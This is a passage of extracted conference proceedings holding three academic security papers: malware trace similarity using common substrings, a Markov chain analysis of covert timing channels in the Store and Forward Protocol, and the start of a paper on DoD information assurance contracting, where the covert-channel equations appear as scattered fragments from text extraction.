using fixed size sequences as in previous work, develop techniques that are not tied to sequence<br />
length and automatically detect varied sized semantically-representative sequences.<br />
2
Jaime Acosta<br />
Some techniques that use semantic structure for finding similarity are in code-clone detection<br />
research. These techniques have been used to identify redundancy to reduce program size or to<br />
identify plagiarism in legitimate software (Roy and Cody, 2007). The problem with using these<br />
techniques for identifying similarity and differences in malware is that the source code of malware is<br />
not available. Some attempts have been made to analyze the sequences of instructions of<br />
disassembled binaries to determine whether they are malicious. One method compared the<br />
disassembled code against behavior templates that are known to exist in malware. These templates<br />
are able to capture malicious behavior, even if the malware has small variation (Christodorescu et al.,<br />
2005). Another method (Ye et al., 2007) uses the Intelligent Malware Detection System (IMDS), to<br />
identify malware instances by checking if certain sequences of Application Programming Interface<br />
(API) calls exist in a binary Portable Exchange (PE) file. A limitation of both of these examples is that<br />
they assume the binary file is not packed and is not virtualized.<br />
In this paper the longest common substring algorithm is modified and used to identify common event<br />
sequences of varying size among a set of malware. Also, the algorithm works on the dynamic traces<br />
of malware, which are evident even if the malware is packed or virtualized.<br />
3. Dataset<br />
3.1 Sandbox environment<br />
The dataset used for this research was obtained from the Malheur website (http://pi1.informatik.unimannheim.de/malheur/)<br />
and was collected over a period of three years. In particular, the Reference<br />
dataset is used, which consists of the dynamic trace events of 3131 malware instances that are<br />
grouped into 24 types, as assigned by six anti-virus scanners. The dynamic traces of the malware<br />
instances were generated by CWSandbox. The event traces range in size from 700 B to 3.4 MB. The<br />
traces are encoded in the Malheur instruction set (MIST) format and are in sequential order.<br />
Furthermore, the traces are separated by thread behaviors of the executable.<br />
3.2 MIST<br />
The dynamic trace of the malware instances in the dataset are logs of the events that occurred as the<br />
result of the execution of the malware binary. The logs contain details about each event that may be<br />
of different levels of interest to an analyst, or to analysis software. MIST encodes events in a format<br />
that will prioritize log details, e.g., filenames, sleep delay times and memory addresses associated<br />
with each event trace. In total there are 120 system calls that fall into 13 more general categories<br />
(e.g., winsock_op, file_open system calls are both in the winsock category). An extensive description<br />
and examples of MIST are presented in (Trinius et al., 2010).<br />
4. The common substrings algorithm<br />
The algorithm developed to identify shared behaviors in malware instance event traces is a modified<br />
version of the well-known longest common substring algorithm (Cormen et al., 2001). The main<br />
difference is that in the modified version, all common substrings of a minimum length are identified,<br />
instead of only the longest.<br />
There are two main procedures that are executed to find the amount of shared behavior in the<br />
malware instances. Figure 1 is the reduction procedure that calculates the amount of common<br />
behavior in the event traces. In line 2, all common substrings are stored in the commonSubstrings<br />
variable. In order to efficiently process the files, this step was first run on instances that were labeled<br />
in the same malware class, i.e., all event traces within the ALLAPLE malware instances (as assigned<br />
by anti-virus software) were compared first, then all EJIK traces, etc.<br />
In lines 3-4, the commonSubstrings are sorted in descending order and output to a file. This allows<br />
the commonsSubstrings to be used to find commonality with other datasets. In lines 5-9, the<br />
occurrences of all strings in commonSubstrings of at least size min are identified in the largeFileSet.<br />
They are then counted and removed. Removing the occurrences in the largeFileSet allows calculating<br />
the amount of common behavior that exists in these malware instances (line 10).<br />
3
Figure 1: The reduction procedure<br />
Jaime Acosta<br />
The CommonSubstring procedure (Figure 2) starts by reading the event traces from two input files<br />
(lines 1-5). In the case that the next event sequences match in the two files, a temporary string,<br />
currSubstring, keeps track of the matching sequences (lines 12-24). When the event sequence is<br />
dissimilar in the two files, the current common substring, currSubstring, is stored if it is unique (8-10)<br />
and finally cleared (11). For this research, a hash table was used to ensure that only unique instances<br />
are stored. Lastly, all common substrings found are returned to the calling procedure in line 25.<br />
Figure 2: The CommonSubstring procedure<br />
In practice, because the malware instances share a high amount of common behaviors, the storage<br />
space required to save the unique common substrings is small (less than 50 MB using substrings<br />
greater than or equal to 2).<br />
5. Experimental setup<br />
In order to determine whether common behavior exists in the malware instances, the Reference<br />
dataset was separated into two sets: small and large. The small set contained 2071 instances of<br />
malware that are less than 100 KB in size. The large set contained 1060 instances of malware that<br />
were between 100 KB and 4 MB in size. For this research, only the malware size, not the type as<br />
4
Jaime Acosta<br />
assigned by an anti-virus scanner, were used when separating the dataset. For the most part, the<br />
malware types for small and large sets are different. Table 1 shows more details on the dataset and<br />
how it was partitioned.<br />
Table 1: Details on small and large sets<br />
Small Set Large Set<br />
Total # event trace files 2,071 1,060<br />
Total # events 1,217,985 17,400,262<br />
Total size of event trace files 44 MB 490 MB<br />
The smaller dataset was used for capturing the set of common substrings in the hopes that large<br />
complex malware instances may be broken down into behaviors that exist in small malware. For<br />
example, it may be the case that part of a malware instance exhibits the behavior of a trojan to collect<br />
data and may also self-replicate like a worm virus.<br />
The level of detail needed when finding common behavior among malware instances was based on<br />
Rieck et al.’s (2010) work. In their experiment, they found that the best configuration for clustering<br />
malware instances was realized when using MIST level 1. This means that only the event names, not<br />
any other details such as parameters, from the traces were used when searching for common<br />
behaviors. Although his method compared fixed size event q-grams, the methods in this experiment<br />
are similar; therefore MIST level 1 was used.<br />
The Reduction algorithm presented in Figure 1 was first run on the small set. In order to more<br />
efficiently process the data, the input was split into four equal size chunks and was processed<br />
concurrently on four computers. After the common substrings from the small set were captured, the<br />
next step was to determine the common behavior that occurs in the large file set.<br />
6. Results<br />
The results show that there is much common behavior among the malware instances. From an<br />
analyst’s point of view, the preferred case is that longer substrings are prevalent among the malware<br />
because these longer substrings most likely capture more semantically rich behavior blocks. If the<br />
substrings are all too short, the effect would be less interesting because it would take almost the same<br />
amount of effort to analyze event traces.<br />
In order to help investigate what is actually happening in the data, the experiment was run several<br />
times using different allowable minimum lengths to identify common substrings. For example, if the<br />
allowed minimum length is six event sequences, all common substrings less than size six are ignored<br />
and are not removed from the large set. Therefore, the reduction percentage, in this example, would<br />
only be based on substrings size six and greater. Figure 3 shows the results for minimum lengths<br />
ranging from 2 to 100.<br />
The graph shows that when only considering substrings of length at least 12, half of the large dataset<br />
can be accounted for using the common substrings in the small set. This indicates that by starting on<br />
small traces, an analyst can break down a large complex trace by removing common behaviors.<br />
When using a minimum length of 24, it seems the restriction is too great; only 30% is accounted for in<br />
the large set, but this also signifies that the dataset represents a reasonable distribution of dissimilar<br />
malware. If the malware all showed high level of similar behavior with many long sequences, it may<br />
be the case that the collected malware is not a good representation of different types of malware. For<br />
example, when looking at some of the longest common substrings found within the small set, it was<br />
sometimes the case that two malware differed only by a few events. Further investigation revealed<br />
that these two malware instances were of the same type and only differed probably to confuse a<br />
hash-based virus scanner.<br />
When using a minimum size of two, 96% of the large dataset is accounted for, but this is not practical<br />
because most of the shared sequences are short. This is evident because the percentage of shared<br />
behavior drops as the sequence minimum increases.<br />
5
Jaime Acosta<br />
Figure 3: Average percentage of the large set that is accounted for by common substrings of the<br />
small set<br />
7. Conclusions and future work<br />
This paper has provided a technique that can be used for similarity analysis on malware, based on<br />
dynamic behavior that was captured using CWSandbox. The results show that the similarities are not<br />
restricted to small sequences; many large sequences are shared among the malware instances,<br />
which mean that there are in fact many shared behaviors present that could be identified and possibly<br />
labeled using natural language to reduce an analyst’s workload, matching the intentions of Kirillov et<br />
al. (2010).<br />
Future work will test the methods described in this paper with a larger dataset. In addition, instead of<br />
limiting the process to sequential instructions, it may be useful to instead identify templates of<br />
behavior, as Christodorescu et al. (2005) did for static malware analysis. For example, there may be a<br />
trace that contains a sequence of five wait events and another with ten. Semantically, these are<br />
almost equivalent, but the common substring algorithm presented here does not capture this; a<br />
template method could. Tailoring to malware some techniques used in identifying code clones, such<br />
as in (Roy and Cody, 2007) may also prove useful.<br />
The work described here is an initial step for a tool that can be used to semantically label portions of<br />
files to allow for more efficient identification of both redundancy (use of legitimate 3 rd party libraries)<br />
and overlap (reuse of malware code) in malware instances.<br />
Acknowledgments<br />
I would like to thank Victor Mena, Ken Fabela, and Michael Shaughnessy for their valuable comments<br />
and suggestions that led to the maturation of this work. Also, I would like to thank Konrad Rieck and<br />
colleagues for the dataset and feedback.<br />
References<br />
Baecher, P., Koetter, M., Holz, T., Dornseif, M. and Freiling, F. (2006) “The Nepenthes platform: An efficient<br />
approach to collect malware”, Recent Advances in Intrusion Detection, No. 4219, pp 165–184.<br />
Bayer, U., Comparetti, P.M., Hlauschek, C., Kruegel, C. and Kirda, E. (2009) “Scalable, behavior-based malware<br />
clustering”, Network and Distributed System Security Symposium (NDSS).<br />
Bayer, U., Moser, A., Krügel, C. and Kirda, E. (2006) “Dynamic analysis of malicious code”, Journal in Computer<br />
Virology, Vol. 2, No. 1, pp 67–77.<br />
Christodorescu, M., Jha, S., Seshia, S. A., Song, D. and Bryant, R.E. (2005) “Semantics-Aware Malware<br />
Detection”, IEEE Symposium on Security and Privacy, pp 32–46.<br />
6
Jaime Acosta<br />
Cormen, T.H., Leiserson, C.E., Rivest, R.L., Stein, C. (2001) Introduction to Algorithms, The MIT press.<br />
Cornelissen, B. (2009) “Evaluating Dynamic Analysis Techniques for Program Comprehension”, Delft University<br />
of Technology.<br />
Göbel, J. G. (2009) “Amun: Python honeypot”, http://amunhoney.sourceforge.net.<br />
Han, S., Lee, K. and Lee, S. (2010) “Packed PE File Detection for Malware Forensics”, Second International<br />
<strong>Conference</strong> on Computer Science and its Applications (CSA), pp 1–7.<br />
Jang, J. and Brumley, D. (2009) “BitShred: Fast, Scalable Code Reuse Detection in Binary Code”, CMU-CyLab,<br />
pp 28–37.<br />
Kasina, A., Suthar, A. and Kumar, R. (2010) “Detection of Polymorphic Viruses in Windows Executables”,<br />
Contemporary Computing, pp 120–130.<br />
Kirillov, I., Beck, D., Chase, P., and Martin, R. (2010) “Malware Attribute Enumeration and Characterization”,<br />
http://maec.mitre.org/.<br />
Lee, J., Jeong, K., and Lee, H. (2010) “Detecting metamorphic malwares using code graphs”, ACM Symposium<br />
on Applied Computing, pp 1970–1977.<br />
Norman Solutions (2003), “Norman sandbox whitepaper”<br />
http://download.norman.no/whitepapers/whitepaper_Norman_SandBox.pdf<br />
Provos, N. (2004) “A virtual honeypot framework”, USENIX Security Symposium, Vol. 13, pg 1.<br />
Rieck, K., Trinius, P., Willems, C. and Holz, T. “Automatic Analysis of Malware Behavior using Machine<br />
Learning”, Journal of Computer Security (JCS), to appear 2010.<br />
Roy, C.K. and Cordy, J.R. (2007) “A survey on software clone detection research”, Queen’s School of Computing<br />
TR, Vol. 541, pg 115.<br />
Sharif, M., Lanzi, A., Giffin, J. and Lee, W. (2009) “Automatic reverse engineering of malware emulators”, IEEE<br />
Symposium on Security and Privacy, pp 94–109.<br />
Trinius, P., Willems, C., Holz, T. and Rieck, K. (2010) “A Malware Instruction Set for Behavior-based Analysis”,<br />
Sicherheit 2010, pp 205–216.<br />
Vinod, P., Jaipur, R., Laxmi, V. and Gaur, M.S. (2009) “Survey on malware detection methods”, Hack, pg 74.<br />
Willems, C., Holz, T., Freiling, F. (2007) “Toward automated dynamic malware analysis using CWSandbox”, IEEE<br />
Security and Privacy, Vol. 5, No. 2, pp 32–39.<br />
Ye, Y., Wang, D., Li, T., Ye, D. and Jiang, Q. (2007) “An intelligent PE-malware detection system based on<br />
association mining”, Journal in computer virology, Vol. 4, No. 4, pp 323–334.<br />
7
Modeling and Justification of the Store and Forward<br />
Protocol: Covert Channel Analysis<br />
Hind Al Falasi and Liren Zhang<br />
United Arab Emirates University, Al Ain, United Arab Emirates<br />
hindalfalasi@uaeu.ac.ae<br />
lzhang@uaeu.ac.ae<br />
Abstract: In an environment where two networks with different security levels are allowed to communicate, a<br />
covert channel is created. The paper aims at calculating the probability of establishing a covert channel between<br />
the high security network and the low security network using Markov Chain Model. The communication between<br />
the networks follows the Bell-LaPadula (BLP) security model. The BLP model is a “No read up, No write down”<br />
model where up indicates an entity with a high security level and down indicates an entity with a low security<br />
level. In networking, the only way to enforce the BLP model is to divide a network into separate entities, networks<br />
with a low security level, and others with a high security level. This paper discusses our analysis of the Store and<br />
Forward Protocol that enforces the BLP security model. The Store and Forward Protocol (SAFP) is a gateway<br />
that forwards all data from a low security network to a high security network, and it sends acknowledgments to<br />
the low security network as if they were sent from the high security network; thereby achieving reliability of the<br />
communication in this secure environment. A timing covert channel can be established between the two networks<br />
by using the times of the acknowledgments to signal a message from the high security network to the low<br />
security network. A high security network may send acknowledgments immediately or with some delay where the<br />
time of the acknowledgments arrival is used to convey the message. The covert channel probability is found to be<br />
equal to the blocking probability of the SAFP buffer when analyzing the problem using Markov Chain Model.<br />
Increasing the size of the buffer at the SAFP decreases the covert channel probability. Carefully determining the<br />
size of the buffer of the SAFP ensures minimizing the covert channel probability.<br />
Keywords: covert channel, access model, Markov Chain Model, store and forward protocol<br />
1. Introduction<br />
Covert channels may be introduced to secure networks both intentionally and unintentionally.<br />
Consider a computer system were two networks with different security levels are communicating; the<br />
existence of covert channels can compromise the efforts exerted to prevent access to higher security<br />
level information by a lower security level network. Security procedures should be established to<br />
prevent the lower network from reading the higher network files, and ensure that the higher network<br />
cannot write to the lower network files. We are referring to a multilevel secure setting where different<br />
networks have different security levels. The notion of having rules that state “No read up", and "No<br />
write down” is in accordance with the BLP security model (Bell and LaPadula 1973). The model's<br />
security procedures make it mandatory for information to flow from the low security network to the<br />
high security network only.<br />
In this paper we are interested in one type of covert channel, a timing channel. In timing channels,<br />
information is transmitted by the timings of events (Wray 1991). This channel is established whenever<br />
the higher network is able to hold up the SAFP (Kang and Moskowitz 1995) response time to signal<br />
an input to the lower network. An acknowledgement sent by the SAFP to the lower network without<br />
delay means no message; however, if the acknowledgment is sent with delay, the value of the delay<br />
is translated by the lower network as an alphabet. Therefore, a communication channel is established<br />
between the two networks with the output constructed from the different delay time values. The<br />
medium in which the covert channel exists is the network environment in our channel i.e. network<br />
covert channel (Cabuk et al., 2009). The channel manages to control the timing of legitimate network<br />
traffic to allow the leaking of confidential data. The purpose of the covert channel analysis is to<br />
calculate the best size buffer for the SAFP to minimize the probability of the covert channel<br />
establishment.<br />
2. Background and motivation<br />
Information flow between two networks with different security levels should not only be governed by<br />
the rules of the BLP security model. An integral part of implementing the BLP security model is<br />
ensuring that any weaknesses of the system implementing the model do not defeat the purpose<br />
behind it. Being able to identify the circumstances that lead to establishing a covert channel between<br />
the two communicating networks is the first step towards eliminating the covert channel. The<br />
importance of identifying the existence of covert channels stems from the fact that they are used to<br />
8
Hind Al Falasi and Liren Zhang<br />
transfer information secretly, where the ultimate goal of covert channels is to conceal the very<br />
existence of the communication (Zander et al., 2007).<br />
The capacity of the covert channel was analyzed as a function of buffer size and moving average size<br />
by Kang and Moskowitz (Kang and Moskowitz, 1993; 1995). The analysis was performed on a Pump<br />
that used randomized acknowledgments which are also used to control the input rate of a source. In<br />
addition, several protocols were reviewed and implemented (Kang and Moskowitz, 1993), and the<br />
proposed protocols in their work were designed to reduce the bandwidth of covert channels.<br />
3. Store and Forward Protocol (SAFP)<br />
The Store and Forward protocol is a simple protocol used for reliable communication between two<br />
networks. The protocol effectiveness is limited in minimizing the existence of covert channels.<br />
However, we use it in this paper as a benchmark to calculate the probability of a timing covert channel<br />
as the advantage of the protocol is in its simplicity to analyze.<br />
The idea behind this protocol is simple: There are two networks communicating, one network has a<br />
low security level, and the other has a high security level. There is a gateway between the two<br />
networks. The gateway does the following job: it receives a packet from the low security network,<br />
stores it in a buffer, and then sends an acknowledgment to the low security network indicating the<br />
successful receipt of that packet. The gateway then forwards the packet to the high security network<br />
and waits for an acknowledgment of receipt. If no such acknowledgment is received, the gateway<br />
retransmits the packet to the high security network. Only after the receipt of the acknowledgment<br />
does the gateway delete that packet from its buffer.<br />
All traffic from the high security network is ignored except for the acknowledgments. This notion is in<br />
accordance with the BLP security model which is a “No read up, No write down” model where up<br />
indicates an entity with high security level and down indicates an entity with low security level. The<br />
gateway forwards all data from the low security network to the high security network, and it does not<br />
forward acknowledgments from the high security network to the low security network; however, it<br />
achieves reliability of the communication by sending acknowledgments to the low security network<br />
(Figure 1).<br />
Figure 1: Store and Forward Protocol (SAFP)<br />
3.1 The covert channel<br />
The problem with the store and forward protocol is that it permits covert channels to exist between the<br />
high security network and the low security network through the acknowledgments. A timing covert<br />
channel can be established between the two networks by using the time values of the<br />
acknowledgments to signal a message from the high security network to the low security network. A<br />
high security network may send acknowledgments immediately or with some delay where the value of<br />
the delay is used to convey the message.<br />
3.2 TCP sliding window effect<br />
The SAFP notifies the low security network of the number of bytes it is willing to receive, which then<br />
becomes the low security network send window. On the other side, the high security network notifies<br />
the SAFP of the number of bytes it is willing to receive, which then becomes the SAFP send window.<br />
At first glance, the use of TCP's sliding window appears to reduce the probability of the covert channel<br />
by minimizing the number of acknowledgments. The low security network can send several packets<br />
without waiting for acknowledgments. Similarly, the high security network can acknowledge several<br />
9
Hind Al Falasi and Liren Zhang<br />
packets at once. Therefore, for every sequence of packets sent, only one piece of useful information<br />
is sent via one acknowledgment. However, the high security network can set the size of the sliding<br />
window to one which requires that every packet is acknowledged before the next one is sent, sending<br />
us back to square one.<br />
4. The covert channel analysis<br />
4.1 Notations<br />
The following acronyms are used in the paper: LSN stands for Low Security Network, and HSN<br />
stands for High Security Network.<br />
Table 1: The table contains the notations we will use throughout the paper, and in the illustration<br />
figures<br />
4.2 Assumptions<br />
LSN SAFP: λ 1<br />
SAFP LSN:µ1<br />
LSN SAFP = T1<br />
LSN SAFP = α1<br />
RL: Ack rate from SAFP LSN<br />
Arrival Rate = λ<br />
Service Rate = µ<br />
Packet Size = Ri<br />
Queuing Delay = q<br />
Transmission delay = Tx<br />
Propagation Delay:<br />
Acknowledgement Rate (Ack/sec):<br />
SAFP HSN: λ 2<br />
HSN SAFP: µ2<br />
SAFP HSN = T2<br />
SAFP HSN = α2<br />
RH: Ack rate from HSN SAFP<br />
T1 and T2 of the acknowledgment packets are ignored because the packet size is small. In addition,<br />
the processing (service) time at SAFP is negligible.<br />
4.3 Discussion<br />
In this section, we investigate the time it takes one packet to travel from the low security network to<br />
the high security network. In addition, we investigate the time it takes an acknowledgement of the<br />
packet to reach the SAFP; as well as the time an acknowledgment from the SAFP to low security<br />
network takes to reach its destination. Calculating the time from the SAFP point of view; the i th packet<br />
is received at α1 + T1. Moreover, the i th packet is deleted from the buffer at α1 + T1 + 2α2 + T2 + 1/ µ2,<br />
where α1 represents the propagation delay of the packets sent between the low security network and<br />
the SAFP. Similarly, α2 represents the propagation delay of the packets sent between the SAFP and<br />
the high security network. T1 and T2 represent the transmission delay from the low security network to<br />
the SAFP, and the SAFP and the high security network, respectively. Finally, 1/ µ2 is the service time<br />
at the high security network.<br />
When we take the distance between the SAFP gateway and the high security network into<br />
consideration, the time a packet stays in the SAFP buffer changes. For example, if the distance is<br />
very large, then we can ignore T2 and 1/ µ2. Therefore, the i th packet is deleted from the buffer at α1 +<br />
T1 + 2α2. As a result, the ability of the high security network to control the acknowledgment rates;<br />
10
Hind Al Falasi and Liren Zhang<br />
therefore, creating a covert channel diminishes. The service time at the high security network is the<br />
only factor under the control of the high security network. The other elements are controlled by the<br />
physical environment of the network. On the other hand, if the distance between them is small, we<br />
estimate that the i th packet is deleted from the buffer at α1 + T1 + T2 + 1/ µ2.<br />
Another element to consider is the high security network service time, which affects the SAFP<br />
queuing time. We are considering this element because it leads to the establishment of a timing<br />
covert channel between the high security network and the low security network. A slow service time<br />
eventually leads to a full buffer at the SAFP. In other words, packets from the low security network are<br />
lost; therefore, no acknowledgments are sent from the SAFP to the low security network. From there,<br />
the high security network can control the SAFP buffer; subsequently, it can control the rate of the<br />
acknowledgments from the SAFP to the low security network. Therefore, it can use the delays to<br />
signal messages to the low security network. The SAFP buffer is modeled using the M/M/1/K model<br />
as it has a finite capacity where the maximum number of packets in the buffer is K. A packet enters<br />
the queue if it finds fewer than K packets in the buffer and is lost otherwise. The probability of a full<br />
buffer = blocking probability = probability of a covert channel. An illustration of the above scenario is<br />
presented in Figure 2.<br />
Figure 2: Communication representation between low security network, SAFP and high security<br />
network<br />
5. Analysis of the system using Markov chain model<br />
Using the state transition diagram (see Figure 3), we found the blocking probability of the SAFP buffer<br />
(PK):<br />
Solving the equations in terms of P0:<br />
p<br />
p<br />
p<br />
(<br />
1<br />
2<br />
k<br />
1<br />
2<br />
p<br />
1<br />
0<br />
p<br />
K<br />
1<br />
2<br />
1<br />
2<br />
1<br />
2<br />
2<br />
p<br />
0<br />
2<br />
k<br />
2<br />
) p<br />
1<br />
p<br />
p<br />
k<br />
p<br />
1<br />
p<br />
0<br />
0<br />
K 1<br />
1<br />
p<br />
k 1<br />
k<br />
k<br />
P<br />
K<br />
0<br />
1<br />
2<br />
p<br />
1<br />
2<br />
k 1<br />
K<br />
p<br />
0<br />
k<br />
1<br />
k<br />
0<br />
k<br />
K<br />
K<br />
1<br />
11<br />
(1)<br />
(2)<br />
(3)
Solving for PK:<br />
K<br />
Pk<br />
p0<br />
K<br />
1<br />
k 0 k 0 2<br />
p<br />
k<br />
1<br />
2<br />
k<br />
p<br />
0<br />
k<br />
1<br />
p<br />
p<br />
0<br />
k<br />
Hind Al Falasi and Liren Zhang<br />
k<br />
k<br />
K<br />
K<br />
1<br />
0 2<br />
1<br />
2<br />
1<br />
1<br />
0 2<br />
k<br />
k<br />
k<br />
*Where PK = PB = Probability an arriving packet is turned away due to full buffer = Probability of a<br />
covert channel.<br />
Figure 3: Markov chain model of the SAFP queue<br />
6. Results<br />
Figure 4 provides an overview of the relationship between the blocking probability and the size of the<br />
SAFP buffer. We are assuming the simplest possible scenario, where the arrival rate is twice as fast<br />
as the service rate. Starting with a buffer with size 0, the blocking probability is 1.<br />
Figure 4: Pk vs. K<br />
This is understandable, as at this point the SAFP is turning away every packet, due to lack of storage<br />
place. When the size of the buffer is 2, we calculate a probability of a covert channel which is more<br />
than 50%. While the probability slightly decreases as we increase the size of the buffer, we find that<br />
12<br />
(4)<br />
(5)
Hind Al Falasi and Liren Zhang<br />
the value stabilizes at 0.5 where the change in the blocking probability value is negligible. When the<br />
buffer size exceeds 10, one packet will be serviced and one will be blocked no matter what. As long<br />
as the arrival rate is twice the service rate, whenever a packet from the buffer is accepted to be<br />
serviced, room is made for one packet to enter the buffer. This explains the 0.5 blocking probability.<br />
The blocking probability decreases as the buffer size increases because fewer packets are turned<br />
away, due to a full buffer. When a packet enters the SAFP queue, an acknowledgment of receipt is<br />
sent from the SAFP to the low security network, which means there is no delay that can interpreted as<br />
a message from the high security network. If we desire a blocking probability of 0.5, then we need a<br />
buffer capable of holding at least 10 packets.<br />
7. Conclusion<br />
We examined the SAFP protocol, which is used to provide reliability of communication between two<br />
networks with different security levels. We argued that a timing covert channel can exist between the<br />
two networks, given the possibility that malicious users are able to control the acknowledgments<br />
arrival time. We analyzed the timing of the packets flowing between the two networks and the SAFP,<br />
and the probability of the covert channel between the low security and high security network. The<br />
purpose of our covert channel analysis was to calculate the best size buffer for the SAFP to keep the<br />
probability of the covert channel to minimum which we found dependent on the arrival rate of LSN<br />
packets and the service rate at the HSN. We have created a mathematical model to calculate the<br />
covert channel probability and define the factors that affect the probability with increase or decrease.<br />
One of our future plans includes building a mathematical model for a Data Pump (Kang and<br />
Moskowitz, 1993; 1995).<br />
References<br />
Bell, D. and LaPadula, L. (1973) Secure Computer Systems: Mathematical Foundation. ESD-TR-73- 278, Vol.1,<br />
Mitre Corp.<br />
Bolch, G., Greiner, S., DeMeer, H. and Trivedi, K.S. (2006) Queueing Networks and Markov Chains: Modeling<br />
and Performance Evaluation with Computer Science Applications. Second Edition, Wiley Interscience,<br />
Hoboken, NJ.<br />
Cabuk, S., Brodley, C., and Shields, C. 2009. IP Covert Channel Detection. ACM Transactions on Information<br />
System Security, Volume 12, Issue 4 (Apr. 2009), pp. 129.<br />
Kang, M. and Moskowitz, I. (1995) A Data Pump for Communication. NRL Memo Report 5540-95-7771.<br />
Kang M. and Moskowitz, I. (1993) A Pump for Rapid, Reliable, Secure Communication. Proceedings ACM Conf.<br />
Computer and Comm. Security '93, Fairfax, VA, pp.119-129.<br />
Ogurtsov, N., Orman, H., Schroeppel, R., O’Malley, S., and Spatscheck, O. (1996) Covert Channel Elimination<br />
Protocols. Technical Reports TR96-14. Department of Computer Science, University of Arizona.<br />
Wray, J. C. (1991) An Analysis of Covert Timing Channels. Research in Security and Privacy. Pages 2-7.<br />
Zander S., Armitage, G. and Branch, P. (2007) Covert Channels and Countermeasures in Computer Network<br />
Protocols. Communications Magazine, IEEE. Vol.45. Pages 136-142.<br />
13
The Evolution of Information Assurance (IA) and<br />
Information Operations (IO) Contracts across the DoD:<br />
Growth Opportunities for <strong>Academic</strong> Research – an Update<br />
Edwin Leigh Armistead 1 and Thomas Murphy 2<br />
1 Goldbelt Hawk LLC and Norwich University, USA<br />
2 NorthLight Technologies, USA<br />
larmistead@gbhawk.com<br />
earmiste@norwich.edu<br />
tmurphy@rochester.rr.com<br />
Abstract: Four years ago, the authors presented a paper at the ICIW conference in Monterey, CA (Armistead &<br />
Murphy, 2007) that outlined opportunities for academics and researchers with regard to IO (Information<br />
Operations), IW (Information Warfare) and IA (Information Assurance) contracts across the Department of<br />
Defense (DoD) and Federal government (USG). The original paper highlighted a differential in contracts available<br />
and the current opportunities were at that time. Specifically, that paper predicted what the future may hold for<br />
further growth in these areas and how growth of IO, IA and IW contract vehicles can benefit universities and<br />
academics from a funding aspect. Finally, the original paper also suggested future areas of research that<br />
academics may be interested in exploring, to best optimize their ability to secure grants and contracts over the<br />
next few years. This paper is not only an update to the original research, to review the original hypothesis and<br />
determine if the predictions from four years ago were correct, but it also mines new data sources to take a fresh<br />
look at current contracts. In this research, the authors analyze the growing new opportunities in cyber warfare,<br />
strategic communications, psychological operations and cyber security. The scope of IO / IA is also expanding<br />
farther into areas of diplomacy, economics, and homeland security, while growing even more central to complex<br />
unconventional and conventional warfare applications. In addition, organizational change is accompanying these<br />
doctrinal and application area changes, which has led to a subsequent revision of the contract opportunities<br />
available. Likewise, new revisions of policy and documentation are also expected to arrive in the foreseeable<br />
future, which could lead to a deeper understanding and appreciation of cultural values and psychological roles<br />
among the multiple political players. In this review, we explore what new and promising opportunities for<br />
collaboration exist for academics, and we hope that this paper can alert researchers to alternate opportunities for<br />
funding in the IO and IA arena that they may not have considered previously.<br />
Keywords: information assurance, information operations, Department of Defense, contracts, proposals<br />
1. Introduction<br />
For many academics, funding is always a constant pursuit. With the current recession, grants and<br />
other non-profit opportunities may have become more limited than in previous time periods. In this era<br />
of fiscal constraint, this paper examines another method of obtaining funds for academics that should<br />
be considered. Specifically, the authors are interested in the opportunities that lay within the realm of<br />
DoD and Federal contracting, where academics can act as consultants to the companies that are<br />
supporting these entities. In some cases, this can be quite a lucrative venture, and if offers other<br />
avenues besides grants and academic scholarships, to offset the financial needs of the tenured<br />
scholar. Therefore, this paper reviews the types of research areas that have experienced the most<br />
growth, as well as areas that will experience future growth. We identify the DoD and Federal<br />
contractors that have the best success in obtaining contracts in the IA and IO areas. We give<br />
extensive details of the global and United States Government (USG) environment, which drive the<br />
security business as well. The authors also discuss how the USG and interagency interactions<br />
influence contracting policies and awards. Understanding all of the forgoing factors and strategies will<br />
allow the academic researcher to formulate targeted business plans to employ in their search for<br />
additional funding.<br />
2. IA and IO business growth areas – players, relationships and influences<br />
The Federal IA segment is characterized by agency management that is policy, doctrine and<br />
reputation motivated.<br />
Civilian agencies IT security directives are driven by the magnitude, not by the quantity of events.<br />
Overriding political priorities mitigate new government-wide IT security legislation. Trade-offs of<br />
efficiency and effectiveness with security-privacy differs with department.<br />
14
Edwin Leigh Armistead and Thomas Murphy<br />
Agency Corporate Information Security Officers struggle with choosing to simply use a<br />
compliance scorecard or going farther to secure their enterprise. It is easier to say you are<br />
compliant than to prove you are secure. Both are necessary to deliver cost effective solutions.<br />
Department level initiatives drive security agendas. Each USG department has separate<br />
initiatives, which in turn drive their emphasis or lack of emphasis on IA.<br />
Trends in security focus following the path of Perimeter security, then Data security and most<br />
recently Coding security. This end-to-end focus on secure design, development and<br />
implementation is becoming common in all market segments.<br />
Information Systems Security Lines of Business is not expected to cannibalize short term vendor<br />
sales<br />
Demand for Integrated Security Services is growing. Standalone (Point) security opportunities are<br />
on the decline.<br />
Federal agencies still separate IT and physical services. Merger of IT and physical security is<br />
impeded by silos of excellence. Successful contract teams will be able to assist in integrating total<br />
security services.<br />
The Commercial IA segment of the security industry is characterized by an upper management that is<br />
litigation and profit motivated. Major trends are similar to the Federal segment. Secondly, there is a<br />
very rapid consolidation of best industry players. Cyber security firms are motivated to rapidly develop<br />
and offer full suites of integrated and managed services to meet the demand for full services. Large IT<br />
and network organizations can successfully merge with smaller IA firms if the ingenuity of the “pureplay”<br />
or point (individual security component supplier) IA firm is not lost. This is a particularly<br />
advantageous route to speed up the number and scope of offerings and to acquire experienced IA<br />
and Information Security (InfoSec) personnel who are in short supply. It is reasonable to expect<br />
similar motivation and actions in the Federal IA market for the same reasons. Thirdly, there are<br />
external factors, including a continuing rise in cybercrime, which follows the earlier increase in<br />
terrorism. Significant increases (greater than 200%) in cyber crimes occurred over the last two years.<br />
Over 100 million data records have been lost or stolen. The average cost of each data record loss is<br />
about $180/record giving a total estimate of $18 Billion lost over the period of two years, high<br />
motivation to client and criminal alike. There is also a modest trend toward offering cyber and physical<br />
security in packages of offerings.<br />
Agencies and firms increasingly outsource more security activities each year. They determine that<br />
they can achieve cost savings or a higher level of security at the same cost and tend to increase their<br />
outsourcing budgets over time. The firms that do outsource all or part of their IT security activities will<br />
see an increase in their level of security per dollar of investment. Surprisingly, although they don’t<br />
realize it, agencies and firms that outsource Security Services are also likely to benefit from each<br />
other’s decisions to outsource. IT security outsourcing has been shown to result in a reduction in the<br />
firms production costs and a freeing up of other resources. (Outsourcing refers to the relationship<br />
between a firm and another firm it pays to conduct security activities on its behalf). However, without<br />
careful planning and due diligence, the clients return on investment in outsourcing IT security could be<br />
reduced or become negative as a result of a variety of potential costs including both strategic risks<br />
(e.g., principal-agent problems), interoperability issues and other transactions costs.<br />
